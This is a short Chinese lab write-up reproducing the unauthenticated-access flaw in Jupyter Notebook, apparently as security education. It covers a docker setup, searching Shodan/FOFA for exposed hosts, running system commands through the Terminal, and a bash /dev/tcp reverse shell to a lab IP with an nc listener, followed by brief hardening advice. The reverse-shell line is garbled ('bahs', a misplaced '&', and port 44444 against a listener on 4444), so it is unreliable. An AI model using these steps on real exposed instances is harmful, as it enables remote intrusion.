Jupyter Notebook 未授权访问漏洞
Jupyter Notebook(此前被称为 IPython notebook)是基于网页的用于交互计算的应用程序,是一个交互式笔记本,支持运行 40 多种编程语言。Jupyter Notebook是以网页的形式打开,可以在网页页面中直接编写代码和运行代码,代码的运行结果也会直接在代码块下显示。
如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。
一、运行环境
docker-compose up -d
访问:ip:8888
二、漏洞复现
在shadan和FOFA等网络空间搜索引擎中搜索,可发现大量使用Jupyter Notebook的系统。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210709141114834.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5Y2Ftb3JlbGc=,size_16,color_FFFFFF,t_70) 1、直接访问http://192.168.209.138:8888,并没有进行身份校验,未授权可以直接访问。 2、利用Terminal可以直接执行系统命令 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210709151814998.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5Y2Ftb3JlbGc=,size_16,color_FFFFFF,t_70) ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210709151953772.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N5Y2Ftb3JlbGc=,size_16,color_FFFFFF,t_70) 3、
在命令行执行:bahs -i > &/dev/tcp/192.168.209.128/44444 0>&1。
监听机器执行:nc -lvvp 4444
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210709152359278.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210709152331169.png)
三、漏洞防御
1、开启身份验证, 防止止未经授权用用户访问 2、访问控制策略略, 限制IP访问, 绑定固定IP
|